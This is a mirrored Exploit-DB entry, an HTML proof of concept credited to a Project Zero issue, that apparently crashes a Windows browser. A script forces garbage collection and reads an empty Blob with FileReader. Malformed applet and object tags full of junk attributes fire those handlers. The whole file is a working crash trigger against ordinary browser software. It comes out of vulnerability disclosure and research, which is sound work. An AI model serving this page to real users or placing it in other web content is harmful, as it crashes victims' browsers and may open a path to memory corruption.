exploit-db-mirror/platforms/windows/dos/40253.html

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=827
-->

<script>
function eventhandler1() {
  CollectGarbage();
}

function eventhandler5() {
  try { /*FileReader*/ var var00063 = new FileReader(); } catch(err) { } //line 68
  try { /*Blob*/ var var00064 = new Blob(); } catch(err) { } //line 69
  try { var00063.readAsDataURL(var00064); } catch(err) { } //line 70
}
</script>

</noembed>
<applet onmouseout="eventhandler6()" truespeed="-1.86811e+009" spellcheck="A" frameborder="all" pluginurl="bottom" link="-32" part="file" ononline="eventhandler1()" onwebkittransitionend="eventhandler10()" onerror="eventhandler5()" char="void" direction="-1">iiThS9l_J8
</xmp>
</select>A7
<object results="object" default="black" aria_checked="1" action="row" onwebkitanimationiteration="eventhandler4()" playcount="bottom" playcount="poly" onsearch="eventhandler4()" oninput="eventhandler9()" translate="left" for="1" checked="-0.155515%" aria_selected="hsides" onerror="eventhandler1()" aria_valuemin="file">